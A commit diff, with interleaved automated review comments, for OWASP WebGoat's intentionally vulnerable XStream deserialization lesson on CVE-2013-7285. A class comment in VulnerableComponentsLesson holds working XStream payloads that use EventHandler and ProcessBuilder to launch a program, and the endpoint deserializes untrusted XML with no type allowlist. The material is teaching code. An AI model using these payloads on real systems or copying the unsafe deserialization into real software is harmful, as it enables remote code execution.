first step

This commit is contained in:
René Zubcevic 2020-07-05 09:31:32 +02:00 committed by Nanne Baars
parent 317573c897
commit db9e1c4c4f
6 changed files with 114 additions and 53 deletions


@ -22,19 +22,14 @@
package org.owasp.webgoat.vulnerable_components; package org.owasp.webgoat.vulnerable_components;
import com.thoughtworks.xstream.annotations.XStreamAlias; public interface Contact {
@XStreamAlias("contact")
public class Contact {
@XStreamAlias("name")
String name;
public String getName() {
return name;
}
public void setName(String name) {
this.name = name;
}
public Integer getId();
public void setId(Integer id);
public String getFirstName();
public void setFirstName(String firstName);
public String getLastName();
public void setLastName(String lastName);
public String getEmail();
public void setEmail(String email);
} }
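Review bot: Contact is turned into an interface with no Javadoc saying why, and a reader of this file alone cannot tell that the shape is deliberate; the commented `dynamic-proxy` payload and the CVE-2013-7285 reference in VulnerableComponentsLesson suggest it is an interface so XStream can hand back a dynamic proxy that implements it. Suggest a header comment such as `/** Lesson target. Deliberately an interface: XStream can materialise it as a dynamic proxy (see CVE-2013-7285). Do not reuse outside this lesson. */`. The accessors also carry no nullability contract; since `ContactImpl` is a Lombok `@Data` bean, every getter may return null and callers should be told so.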


@ -36,15 +36,15 @@ public class ContactConverter implements Converter {
public void marshal(Object value, HierarchicalStreamWriter writer, MarshallingContext context) { public void marshal(Object value, HierarchicalStreamWriter writer, MarshallingContext context) {
Contact contact = (Contact) value; Contact contact = (Contact) value;
writer.startNode("name"); writer.startNode("firstName");
writer.setValue(contact.getName()); writer.setValue(contact.getFirstName());
writer.endNode(); writer.endNode();
} }
public Object unmarshal(HierarchicalStreamReader reader, UnmarshallingContext context) { public Object unmarshal(HierarchicalStreamReader reader, UnmarshallingContext context) {
Contact contact = new Contact(); Contact contact = new ContactImpl();
reader.moveDown(); reader.moveDown();
contact.setName(reader.getValue()); contact.setFirstName(reader.getValue());
reader.moveUp(); reader.moveUp();
return contact; return contact;
} }
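Review bot: `unmarshal` calls `reader.moveDown()` without first checking `reader.hasMoreChildren()`, so a `<contact/>` with no child element will most likely fail inside the converter instead of yielding an empty ContactImpl, and whichever child comes first is copied into firstName regardless of its tag while id, lastName and email are silently dropped on both marshal and unmarshal. Guard the read with `if (reader.hasMoreChildren()) { reader.moveDown(); contact.setFirstName(reader.getValue()); reader.moveUp(); }`, or loop over the children and dispatch on `reader.getNodeName()`. The `registerConverter(new ContactConverter())` call in VulnerableComponentsLesson is still commented out, so this looks like dead code for now; if it is being kept for a later step, a class comment saying so would help. The enclosing class ContactConverter starts before this hunk.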


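--- /dev/null
+++ b/org/owasp/webgoat/vulnerable_components/ContactImpl.java
@@ -0,0 +1,35 @@
+/*
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details, please see http://www.owasp.org/
+ *
+ * Copyright (c) 2002 - 2019 Bruce Mayhew
+ *
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
+ *
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
+ *
+ * Getting Source ==============
+ *
+ * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
+ */
+package org.owasp.webgoat.vulnerable_components;
+import lombok.Data;
+@Data
+public class ContactImpl implements Contact {
+private Integer id;
+private String firstName;
+private String lastName;
+private String email;
+}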
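Review bot: ContactImpl has no class comment even though it is the only concrete `Contact` and is what a benign payload unmarshals to via the `xstream.alias("contact", ContactImpl.class)` call in VulnerableComponentsLesson. Suggest `/** Plain bean behind the XStream "contact" alias; all four fields are optional and may be null. */`. Worth noting in that comment that Lombok `@Data` also generates `toString()` over every field, which the lesson then echoes back to the user through `feedbackArgs(contact)`.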


@ -24,54 +24,83 @@ package org.owasp.webgoat.vulnerable_components;
import com.thoughtworks.xstream.XStream; import com.thoughtworks.xstream.XStream;
import com.thoughtworks.xstream.io.xml.DomDriver; import com.thoughtworks.xstream.io.xml.DomDriver;
import org.apache.commons.lang3.StringUtils;
import org.owasp.webgoat.assignments.AssignmentEndpoint; import org.owasp.webgoat.assignments.AssignmentEndpoint;
import org.owasp.webgoat.assignments.AssignmentHints;
import org.owasp.webgoat.assignments.AttackResult; import org.owasp.webgoat.assignments.AttackResult;
import org.springframework.web.bind.annotation.*; import org.springframework.web.bind.annotation.*;
@RestController @RestController
//@AssignmentHints({"http-basics.hints.http_basics_lesson.1"}) @AssignmentHints({"vulnerable.hint"})
public class VulnerableComponentsLesson extends AssignmentEndpoint { public class VulnerableComponentsLesson extends AssignmentEndpoint {
/*
*
<contact class='org.owasp.webgoat.vulnerable_components.Contact'>
<handler class='java.beans.EventHandler'>
<target class='java.lang.ProcessBuilder'>
<command>
<string>calc.exe</string>
</command>
</target>
<action>start</action>
</handler>
</contact>
<contact class='dynamic-proxy'>
<interface>org.owasp.webgoat.vulnerable_components.Contact</interface>
<handler class='java.beans.EventHandler'>
<target class='java.lang.ProcessBuilder'>
<command>
<string>calc.exe</string>
</command>
</target>
<action>start</action>
</handler>
</contact>
*/
@PostMapping("/VulnerableComponents/attack1") @PostMapping("/VulnerableComponents/attack1")
public @ResponseBody public @ResponseBody
AttackResult completed(@RequestParam String payload) { AttackResult completed(@RequestParam String payload) {
XStream xstream = new XStream(new DomDriver()); XStream xstream = new XStream(/*new DomDriver()*/);
xstream.setClassLoader(Contact.class.getClassLoader()); xstream.setClassLoader(Contact.class.getClassLoader());
xstream.processAnnotations(Contact.class); //xstream.processAnnotations(Contact.class);
xstream.alias("contact", ContactImpl.class);
//xstream.aliasField("id", Contact.class, "id");
xstream.ignoreUnknownElements();
//xstream.registerConverter(new ContactConverter()); //xstream.registerConverter(new ContactConverter());
//xstream.registerConverter(new CatchAllConverter(), XStream.PRIORITY_VERY_LOW); //xstream.registerConverter(new CatchAllConverter(), XStream.PRIORITY_VERY_LOW);
// Contact c = new Contact(); Contact contact = null;
// c.setName("Alvaro");
// String sc = xstream.toXML(c);
// System.out.println(sc);
// String payload2 = "<sorted-set>" +
// "<string>foo</string>" +
// "<dynamic-proxy>" +
// "<interface>java.lang.Comparable</interface>" +
// "<handler class=\"java.beans.EventHandler\">" +
// " <target class=\"java.lang.ProcessBuilder\">" +
// " <command>" +
// " <string>/Applications/Calculator.app/Contents/MacOS/Calculator</string>" +
// " </command>" +
// " </target>" +
// " <action>start</action>" +
// "</handler>" +
// "</dynamic-proxy>" +
// "</sorted-set>";
try { try {
// System.out.println("Payload:" + payload);
Contact expl = (Contact) xstream.fromXML(payload);
return success(this).feedback("vulnerable-components.fromXML").feedbackArgs(expl.toString()).build(); if (!StringUtils.isEmpty(payload)) {
} catch (com.thoughtworks.xstream.converters.ConversionException ex) { //payload = payload.replace("contact ", "<contact ").replace("/contact ", "</contact");
if (ex.getMessage().contains("Integer")) { payload = payload.replace("+", "").replace("\r", "").replace("\n", "").replace("> ", ">").replace(" <", "<");
}
System.out.println(payload);
contact = (Contact) xstream.fromXML(payload);
} catch (Exception ex) {
return failed(this).feedback("vulnerable-components.close").output(ex.getMessage()).build();
}
try {
if (null!=contact) {
contact.getFirstName();//trigger the example like https://x-stream.github.io/CVE-2013-7285.html
}
} catch (Exception e) {
e.printStackTrace();
return success(this).feedback("vulnerable-components.success").build(); return success(this).feedback("vulnerable-components.success").build();
} }
return failed(this).feedback("vulnerable-components.close").build(); return failed(this).feedback("vulnerable-components.fromXML").feedbackArgs(contact).build();
}
} }
} }
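Review bot: The success oracle in the second try block counts any exception thrown by `contact.getFirstName()` as a completed exploit, so a dynamic proxy whose handler simply throws, or any other failing payload, passes the lesson without running anything, and the trace is dumped with `e.printStackTrace()` instead of a logger. If the intended solution is the `dynamic-proxy` payload quoted in the class comment, a tighter check inside that catch is `if (Proxy.isProxyClass(contact.getClass()) && Proxy.getInvocationHandler(contact) instanceof EventHandler)` (imports `java.lang.reflect.Proxy` and `java.beans.EventHandler`), falling through to `failed(...)` otherwise. Two smaller points in the first try block: `System.out.println(payload)` writes the raw untrusted payload to stdout on every request and looks like a debugging leftover, and `payload.replace("+", "")` discards every `+` after Spring has already form-decoded the parameter, which would corrupt a benign contact whose email contains one — presumably meant to repair pasted XML, so a comment stating that intent would help. The absence of any XStream type allowlist on this endpoint is the lesson's point and is not being flagged.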


@ -1,6 +1,7 @@
vulnerable-components.title=Vulnerable Components vulnerable-components.title=Vulnerable Components
EnterYourName=Enter your Name EnterYourName=Enter your Name
Go!=Go! Go!=Go!
vulnerable.hint=Here is some explanation of someone trying the exercise in an earlier version: https://www.youtube.com/watch?v=iWcRR2WcBFU
vulnerable-components.close=Trying to deserialize null object. vulnerable-components.close=Trying to deserialize null object.
vulnerable-components.success=If you are not seeing the application you started; it may be minimized vulnerable-components.success=You successfully tried to exploit the CVE-2013-7285 vulnerability
vulnerable-components.fromXML=You created contact {0}. This means you did not exploit the remote code execution. vulnerable-components.fromXML=You created contact {0}. This means you did not exploit the remote code execution.


@ -12,3 +12,4 @@ WebGoat Sends an XML document to add contacts to a contacts database.
---- ----
For this example, we will let you enter the xml directly versus intercepting the request and modifying the data. You provide the XML representation of a contact and WebGoat will convert it a Contact object using `XStream.fromXML(xml)`. For this example, we will let you enter the xml directly versus intercepting the request and modifying the data. You provide the XML representation of a contact and WebGoat will convert it a Contact object using `XStream.fromXML(xml)`.
So find information about the CVE vulnerability and sends some payload that triggers the vulnerability.